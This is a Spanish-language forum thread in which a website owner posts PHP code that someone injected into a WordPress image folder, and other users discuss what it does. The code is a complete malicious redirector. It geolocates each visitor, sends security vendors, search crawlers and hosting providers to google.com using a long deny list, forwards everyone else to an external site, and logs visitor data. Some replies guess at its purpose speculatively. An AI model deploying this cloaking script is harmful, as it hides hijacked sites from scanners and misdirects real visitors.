codigo en mi web

  • Autor Autor r0y
  • Fecha de inicio Fecha de inicio
r0y

r0y

Dseda
Verificación en dos pasos activada
Verificado por Whatsapp
Verificado por Binance
saludos me inyectaron el siguiente codigo en mi web y me gustaria saber de que trata, por este codigo me pusieron cartel rojo en google, ya que la competencia al parecer no puede ganarle a mi web con SEO tuvieron que ponerme su disparate en la pagina, Espero y al que hizo esto le vaya bien en todos sus proyectos
Insertar CODE, HTML o PHP: 
<?php
error_reporting(0);
date_default_timezone_set('Asia/Jakarta');
$user_agent     =   $_SERVER['HTTP_USER_AGENT'];

function rand_string($length){
  $chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
  return substr (str_shuffle ($chars),0,$length);
}

function getOS() {
    global $user_agent;
    $os_platform    =   "Another";
    $os_array       =   array(
                            '/windows nt 6.2/i'     =>  'Windows 8',
                            '/windows nt 6.1/i'     =>  'Windows 7',
                            '/windows nt 6.0/i'     =>  'Windows Vista',
                            '/windows nt 5.2/i'     =>  'Windows Server 2003/XP x64',
                            '/windows nt 5.1/i'     =>  'Windows XP',
                            '/windows xp/i'         =>  'Windows XP',
                            '/windows nt 5.0/i'     =>  'Windows 2000',
                            '/windows me/i'         =>  'Windows ME',
                            '/win98/i'              =>  'Windows 98',
                            '/win95/i'              =>  'Windows 95',
                            '/win16/i'              =>  'Windows 3.11',
                            '/macintosh|mac os x/i' =>  'Mac OS X',
                            '/mac_powerpc/i'        =>  'Mac OS 9',
                            '/linux/i'              =>  'Linux',
                            '/ubuntu/i'             =>  'Ubuntu',
                            '/iphone/i'             =>  'iPhone',
                            '/ipod/i'               =>  'iPod',
                            '/ipad/i'               =>  'iPad',
                            '/android/i'            =>  'Android',
                            '/blackberry/i'         =>  'BlackBerry',
                            '/webos/i'              =>  'Mobile'
                        );
    foreach ($os_array as $regex => $value) {
        if (preg_match($regex, $user_agent)) {
            $os_platform    =   $value;
        }
    }
    return $os_platform;
}

function get_browser_name($user_agent){
    if (strpos($user_agent, 'Opera') || strpos($user_agent, 'OPR/')) return 'Opera';
    elseif (strpos($user_agent, 'Edge')) return 'Edge';
    elseif (strpos($user_agent, 'Chrome')) return 'Chrome';
    elseif (strpos($user_agent, 'Safari')) return 'Safari';
    elseif (strpos($user_agent, 'Firefox')) return 'Firefox';
    elseif (strpos($user_agent, 'MSIE') || strpos($user_agent, 'Trident/7')) return 'Internet Explorer';
    return 'Other';
}
$user_os        =   getOS();
$user_browser   =   get_browser_name($_SERVER['HTTP_USER_AGENT']);
$from           = $_SERVER['HTTP_REFERER'];
$ip             = $_SERVER['REMOTE_ADDR'];
$getip          = 'http://ip-api.com/json/' . $ip;
$content        = file_get_contents($getip);
$details        = json_decode($content);
$negara         = $details->countryCode;
$nama_negara    = $details->country;
$organ            = $details->org;
$kode_negara    = strtolower($negara);
$ip             = $_SERVER['REMOTE_ADDR'];
$dateTime       = date("F j, Y, g:i a");
$blocked_words  = array("ams","DigitalOcean","Apple Inc","drweb","Dr.Web","hostinger","scanurl","above","google","facebook","softlayer","amazonaws","cyveillance","phishtank","dreamhost","netpilot","calyxinstitute","tor-exit",);
$denny_ips      = array(
"Apple",
"Avenir Telematique S.A.S.",
"Palo Alto Networks",
"Internet Initiative Japan",
"Atlantic.net",
"Choopa, LLC",
"Digital Ocean",
"DigitalOcean",
"Linode",
"Commtouch",
"Faction",
"RamNode LLC",
"Slovak Telecom",
"Cogent Communications",
"Host1Plus",
"Virginia Polytechnic Institute and State Univ.",
"IPVanish",
"Total Server Solutions L.L.C.",
"Providers Internet Exchange",
"Community Network Center",
"Plusnet",
"Community Network Center Incorporated.",
"STNet, Incorporated",
"ARTERIA Networks Corporation",
"VECTANT",
"ManagedWay",
"Paragon Internet Group Limited",
"Research Organization of Information and Systems",
"Kintetsu Cable Network Co.",
"Chubu Telecommunications Company",
"EGIHosting",
"ColoUp",
"Ishikawa Computer Center Co.,LTD",
"Secured Servers LLC",
"Datacamp Limited",
"ServeTheWorld AS",
"Netstack Cloud Services",
"Hurricane Electric",
"LogicWeb Inc",
"Bell Canada",
"Hosting Solution",
"OVH Hosting",
"OVH SAS",
"Yahoo!",
"SoftLayer Technologies",
"Twitter",
"Web Hosted Group Ltd ",
"M247 Ltd Paris ",
"SunGard Availability Services LP",
"Scaleway",
"FireEye",
"Servers.com",
"ServerMania",
"Top Level Hosting SRL",
"Rheinische Friedrich-Wilhelms-Universitaet Bonn",
"Online SAS Nl",
"Trend Micro Incorporated",
"Amazon.com",
"Trustwave Holdings",
"wideopenwest",
"LeaseWeb Netherlands B.V.",
"D-hosting die Rackspace \u0026 Connectivity GmbH",
"Keyweb AG IP Network",
"Wowrack.com",
"Nexril",
"Versaweb, LLC",
"Kath Codex Pvt.",
"its communications",
"Kakao Corp ",
"Bitdefender SRL",
"China Unicom Liaoning",
"ViaWest",
"Panasonic Corporation Corporate Information System",
"Google Cloud",
"Comodo CA Ltd",
"Google Proxy",
"Mediasift Limited",
"UK Dedicated Servers Limited",
"Googlebot",
"Google",
"GZ Systems",
"active-servers.com",
"Lg Dacom Kidc",
"GTT Communications Inc.",
"Codero",
"Dediserve Ltd",
"Host Sailor Ltd.",
"Yahoo Inc, Internet Content Provider",
"Yahoo Japan",
"Amazon",
"Barracuda Networks",
"Sentris Network LLC",
"internet content provider",
"Yahoo",
"Kaspersky Lab AO",
"Gottfried Wilhelm Leibniz Universitaet Hannover",
"MAXNET",
"Versatel Deutschland",
"O2 Deutschland",
"Versatel Deutschland",
"HEG US",
"PacketExchange",
"TierPoint, LLC",
"Tiggee LLC",
"Symantec Corporation",
"Shanghai Blue Cloud Technology Co.,Ltd",
"Hetzner Online GmbH",
"PayPal",
"PT Telkom Indonesia",
"Cloudflare",
"Enteracloud Solutions",
"Facebook",
"Onavo Mobile",
"NFOrce Entertainment B.V.",
"District School Board of Pasco County",
"Wireless Data Service Provider Corporation",
"Limestone Networks",
"QUALYS",
"M247 Ltd New Jersey",
"Rackspace Hosting",
"Unified Layer",
"Microsoft Azure",
"Microsoft",
"Microsoft bingbot",
"Vultr Holdings, LLC",
"ip-54-36-149-5.a.ahrefs.com",
"51-159-4-12.rev.poneytelecom.eu",
"104.223.67.187.static.greencloudvps.com",
"216.244.66.203",
"104.128.234.122",
"no.rdns.greencloudvps.com",
"crawl6.bl.semrush.com",
"107.155.118.27",
"ip-54-36-148-223.a.ahrefs.com",
"ip-54-36-148-134.a.ahrefs.com",
"36.26.119.49",
"192.210.223.253",
"ip-54-36-148-125.a.ahrefs.com",
"62.210.80.74",
"124.158.5.38",
"49.88.25.140",
"vmi227873.contaboserver.net",
"crawl11.bl.semrush.com",
"23.83.179.134",
"180.117.36.74",
"45.76.155.166.vultr.com",
"113.121.156.94",
"107.45.43.120.broad.nd.fj.dynamic.163data.com.cn",
"crawl1.bl.semrush.com",
"ip-54-36-148-35.a.ahrefs.com",
"115.230.71.32",
"crawl23.bl.semrush.com",
"crawl24.bl.semrush.com",
"103.88.233.5",
"ip-54-36-148-178.a.ahrefs.com",
"230.45.43.120.broad.nd.fj.dynamic.163data.com.cn",
"ec2-54-226-23-160.compute-1.amazonaws.com",
"222.74.237.246",
"180.109.38.141",
"122.241.65.164",
"121.189.37.14",
"static-68-235-34-36.cust.tzulo.com",
"36.70.252.92",
"ip180.ip-144-217-178.net",
"180.117.100.64",
"113.121.243.229",
"117.90.212.166",
"crawl19.bl.semrush.com",
"mx1.heimdall.net",
"62.210.80.58",
"103.90.229.52",
"ip-54-36-149-79.a.ahrefs.com",
"101.37.89.152",
"121.157.50.242",
"crawl19.bl.semrush.com",
"mx1.heimdall.net",
"Vultr",
"Aruba",
"ArubaCloud",
"z.com",
"Microsoft Corporation",
"Level 3 Communications",
"Powerhouse Management",
"Avenir Telematique S.A.S",
"SurfControl",
"Invitech Megoldasok Zrt.",
"Zscaler",
"Telmex",
"Social Security Administration",
"Spectrum",
"Aruba",
"Tata Communications",
"Zscaler Switzerland GmbH",
"Netmagic Datacenter Mumbai",);

$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
foreach($blocked_words as $word) {
    if (substr_count($hostname, $word) > 0) {
        header("Location: https://google.com");
        exit;
    }
}

if (in_array ($organ, $denny_ips)) {
    $fh = fopen('log.txt', 'a+');
    fwrite($fh, 'Blocked by IPs:'." [$user_os - $user_browser - $ip - $organ ] $from\n");
    fclose($fh);
    header("Location: https://google.com");
}
/*
elseif(in_array ($ip, $denyIPs)){
    $crot = fopen('ip.txt, 'a+');
    fwrite ($crot, $ip \n);
    fclose($crot);
    header(Locations; https://google.com");
    }
    */
else{
    $klik = 'total_klik.txt';
    $total = (file_exists($klik)?file_get_contents($klik):0);
    $total = file_put_contents($klik, $total+1);
    $asu = rand_string(20);
    $redirnya = array("https://www.anoptic.com/aws/",);
    $ac = count($redirnya) -1;
    $rd = rand (0,$ac);
    $rda = $redirnya[$rd];
    header("location:".$rda);
    $fh = fopen('log.txt', 'a+');
    fwrite($fh, '[+]DATA MASUK[+]:'."[ $dateTime ] [ $organ ][ $ip ] [ $nama_negara - $user_os - $user_browser  ] $from | $rda\n");
    fclose($fh);
}
exit;
?>
 
¿en donde lo inyectaron y como lo detectaste?
estás usando algun theme o plugin nulled ?
 
Franyer Rivas dijo:
¿en donde lo inyectaron y como lo detectaste?
estás usando algun theme o plugin nulled ?
Hacer clic para expandir...
utilizo toroplay hace un año, primero me salio el cartel rojo en la pagina principal hice redireccion y ya cuando todas las key estaban poniendose en el top me inyectaron ese codigo y google lo detecto y me señalo la URL, ese codigo estaba en imagenes y ahi no puede haber un codigo php
 
raysn22 dijo:
utilizo toroplay hace un año, primero me salio el cartel rojo en la pagina principal hice redireccion y ya cuando todas las key estaban poniendose en el top me inyectaron ese codigo y google lo detecto y me señalo la URL, ese codigo estaba en imagenes y ahi no puede haber un codigo php
Hacer clic para expandir...
vaya, tendras que pedir a un programador que revise si hay vulnerabilidades en el theme o plugins que tienes, ya que si lo hicieron una vez seguramente intenten nuevamente
 
Franyer Rivas dijo:
vaya, tendras que pedir a un programador que revise si hay vulnerabilidades en el theme o plugins que tienes, ya que si lo hicieron una vez seguramente intenten nuevamente
Hacer clic para expandir...
lo curioso es que ese codigo no esta en el dominio principal , solo me lo inyectaron en el segundo, ya tengo un programador trabajando en esas vulnerabilidades, la gente no puede ver progresando una web
 
raysn22 dijo:
lo curioso es que ese codigo no esta en el dominio principal , solo me lo inyectaron en el segundo, ya tengo un programador trabajando en esas vulnerabilidades, la gente no puede ver progresando una web
Hacer clic para expandir...
seguro es una web warez la tuya, es normal , cuando hay una web en los top, las atacan con DDos e inyecciones SQL y todo lo que se les ocurra.
Así que te recomiendo entrar a diario a tu sitio en modo incógnito y desde el móvil y navegar al menos 30 segundos, para revisar que no haya redirecciones o cosas raras
 
Franyer Rivas dijo:
seguro es una web warez la tuya, es normal , cuando hay una web en los top, las atacan con DDos e inyecciones SQL y todo lo que se les ocurra.
Así que te recomiendo entrar a diario a tu sitio en modo incógnito y desde el móvil y navegar al menos 30 segundos, para revisar que no haya redirecciones o cosas raras
Hacer clic para expandir...
Siempre suelo hacer eso, mi web no es tann famosa pero andaba metiéndose por algunas keys, pero el pastel es grande no se porque tanta mala fe en el warez
 
Veo muchas redirecciones en ese codigo!
 
¿Cuántas visitas diarias tenías en la web?

Ese código, ¿en qué archivo del tema lo tenías?

El tema, ¿ lo compraste al creador o lo encontraste por ahí o comprado a otra persona?
 
misterlopez dijo:
¿Cuántas visitas diarias tenías en la web?

Ese código, ¿en qué archivo del tema lo tenías?

El tema, ¿ lo compraste al creador o lo encontraste por ahí o comprado a otra persona?
Hacer clic para expandir...
Tenia 30k diarias, el código estaba en un archivo img que cree para poner banderitas de idiomas, esa carpeta estaba en el wordpress donde esta wp-admin wp-content, y el theme fue puesto gratis por el creador ya la web tiene 1 año y ahora es que me viene a pasar esto
 
wooow son demasiado buenos los que te hicieron el ataque, lei todo el código se paso por paso que hicieron pero abreviando hicieron estas dos cosas.
1) bloquiaron tu trafico tomando todas las ip que los usuarios entrantes así cayeras en el ranking de google y no permitiendoles mas la entrada redigiendolos, aparte de eso que es obvio, identificaron tu trafico no se con algún tipo de propósito de marketing para ellos o algo maso menos asi.
2) por otra parte trataron de infectar los navegadores de tus usuarios, me imagino que para redirigir el trafico a sus web que es lo mas normal.
 
emanuel199811 dijo:
wooow son demasiado buenos los que te hicieron el ataque, lei todo el código se paso por paso que hicieron pero abreviando hicieron estas dos cosas.
1) bloquiaron tu trafico tomando todas las ip que los usuarios entrantes así cayeras en el ranking de google y no permitiendoles mas la entrada redigiendolos, aparte de eso que es obvio, identificaron tu trafico no se con algún tipo de propósito de marketing para ellos o algo maso menos asi.
2) por otra parte trataron de infectar los navegadores de tus usuarios, me imagino que para redirigir el trafico a sus web que es lo mas normal.
Hacer clic para expandir...
Wtf hicieron toda esa vaina, pero por algun lugar entraron quizás el theme o algún plugin incluso ayer me borraron todos los archivos de mi web cuando vieron que yo borraba el archivo infectado que me subieron, cuando empezaron a borrarme los archivos de WordPress vi que me subieron el siguiente archivo hazeen.php entonces ahí accedí a borrar todos los archivos que quedaban
 
Muy interesante la lista de ISP e ips para detectar crawlers, al detectar todos los bots de busqueda pueden reedireccionar el sitio a cualquier lado para que te caiga el ranking por el piso, a las visitas que no son bots de buscadores las reedirecciona al link infectado para que los visitantes no entren mas a tus sitios y pierdas visitas. Muy mal intencionados realmente, vas a tener que trabajar en la seguridad de todo tu theme y wordpress para que no te injecten mas codigos.
 
Dieguit0sk8 dijo:
Muy interesante la lista de ISP e ips para detectar crawlers, al detectar todos los bots de busqueda pueden reedireccionar el sitio a cualquier lado para que te caiga el ranking por el piso, a las visitas que no son bots de buscadores las reedirecciona al link infectado para que los visitantes no entren mas a tus sitios y pierdas visitas. Muy mal intencionados realmente, vas a tener que trabajar en la seguridad de todo tu theme y wordpress para que no te injecten mas codigos.
Hacer clic para expandir...
eso ando buscando alguien que pueda analizar el theme a ver que tal esta la seguridad de el porque supongo que entraron por ahi tuve que hacer una redireccion 301 a un nuevo dominio inmediatamente hice eso empezaron a meterme codigos en ese dominio y no tardo 2 dias para que google me de otro cartel rojo, Que pude quitarlo en seguida eliminando el codigo, pero quiero ponerle seguridad al theme
 
Hay que estar conectado o registrado para responder aquí.

Temas similares

BryanMarc_
  • Cerrado
Me ofrezco Hago tu landing page / Resuelvo problemas de codigo / Implementaciones en tu app o web
Respuestas
1
Visitas
28
AlondraRomero
AlondraRomero
M
Enlaces a tu web con codigo QR?
Respuestas
1
Visitas
41
gifer
gifer
Streaming CenterX
  • Cerrado
Compra PAGINA WEB PARA CODIGO NETFLIX, DISNEY Y PRIME
Respuestas
11
Visitas
195
Luxor MMP
Luxor MMP
these.pectre123456@gmail.
  • Cerrado
Me ofrezco Venta de chips físico (+51) o codigo de verificación de whatsapp o cualquiera red social
Respuestas
0
Visitas
52
these.pectre123456@gmail.
these.pectre123456@gmail.
EspanolTurco
  • Pregunta Pregunta
Europa Cookies Para Pagina Web Codigo "necesito"
Respuestas
0
Visitas
96
EspanolTurco
EspanolTurco
Atrás
Arriba